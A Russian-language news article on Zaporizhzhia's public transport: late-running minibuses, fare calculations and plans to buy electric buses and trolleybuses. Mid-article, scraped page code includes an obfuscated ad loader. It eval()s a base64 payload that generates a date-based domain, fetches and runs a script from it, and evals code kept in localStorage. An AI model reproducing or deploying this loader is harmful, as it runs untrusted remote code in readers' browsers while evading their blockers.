В мэрии объяснили, почему перевозчики не всегда соблюдают график в Запорожье

В Запорожье за круглым столом обсудили перспективы развития и проблемы общественного транспорта города. К участию в мероприятии присоединились представители управления по транспортному обеспечению и связи, Общественного совета, компаний перевозчиков, а также депутаты Запорожского горсовета.

Об этом сообщает «Акцент», ссылаясь на данные сайта мэрии города.

Запорожцы, как известно, постоянно жалуются на состояние и работу маршрутных такси. Транспорт частных перевозчиков часто попадает в скандальные ДТП и не работает по графику. Около 21:30 на проспекте Соборном уже почти не увидеть маршруток, хотя подавляющее большинство направлений в это время еще должны продолжать обслуживать клиентов.

Сами маршрутки часто с дырами в корпусах, грязные, с зашарпанными салонами, протекающими крышами и хамовитыми водителями.

При каждом повышении стоимости проезда городские власти обещают, что данная мера необходима, но зато будет улучшено состояние транспорта. Никаких изменений в эту сторону не следовало. Наоборот, запорожцы все чаще требуют убрать маршрутки с проспекта и заменить их муниципальными автобусами. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

При этом, как рассказал заместитель начальника управления по вопросам транспортного обеспечения и связи городского совета Александр Кухарев, «все графики движения соблюдаются, единичные исключения допускаются по техническим причинам или неблагоприятных погодных условий«.

Количество машин автоперевозчиков, работающих в городе – 670, а по плану их должно быть 840, то есть здесь уже есть отток машин, отток водителей и соответственно дальнейшие негативные случаи. Расчеты перевозчиков у нас 14, 15, 16, 17 гривен, а на некоторых маршрутах еще больше. Впрочем, после обсуждений мы высчитали средний тариф по городу Запорожью – 12-13 гривен. Соответственно 12 гривен по городу, а 13 – из Хортицкого района, поскольку там пассажиры, садясь в маршрутку или автобус, едут почти до конечной остановки и пассажиропоток меньше, — добавил Александр Кухарев.

В мэрии в очередной раз указывают, что повышение стоимости тарифа на проезд позволит предупредить массовое увольнение водителей по собственному желанию, а значит – стабилизировать работу общественного транспорта на городских маршрутах.

Повышение тарифов – это только одна из составляющих общего процесса, ведь необходима комплексная программа развития пассажироперевозок в городе Запорожье. Должны учитывать льготные перевозки: в какой мере горожане нуждаются в них. Также следует помнить, что есть отдаленные районы, в которые транспорт, возможно, не доезжает, а также состояние самого транспорта, ведь GPS-навигация порой не действует и мы не знаем, когда приедут маршрутки или автобусы и какого качества, — отметила глава Общественного совета при исполнительном комитете горсовета Екатерина Акула.

Как отметил директор по финансово-экономическим вопросам КП «Запорожэлектротранс» Владимир Сухачев, в областном центре предпринимаются шаги по улучшению системы городского пассажирского транспорта, соответственно реализуется ряд программ.

Это и программа с Европейским инвестиционным банком, в которой мы планируем закупать около 20 электробусов и пересматриваем идею закупки электробусов меньшего размера или троллейбусов. В настоящее время продолжаются переговоры. Второй проект – гранты в рамках Киотского протокола. Планируется закупка 8 электробусов большой вместимости. Тендер сейчас проходит, некоторые участники процесса выражают свои пожелания, и мы их рассматриваем. Еще у нас есть один проект – это финансовая компания IFC, с которой мы планируем закупку 20 троллейбусов с автономным ходом, — добавил Владимир Сухачев.

Ранее в Запорожье назвали новые «компромиссные» тарифы на проезд в общественном транспорте. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-merii-obyasnili-pochemu-perevozchiki-ne-vsegda-soblyudayut-grafik-v-zaporozhe/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top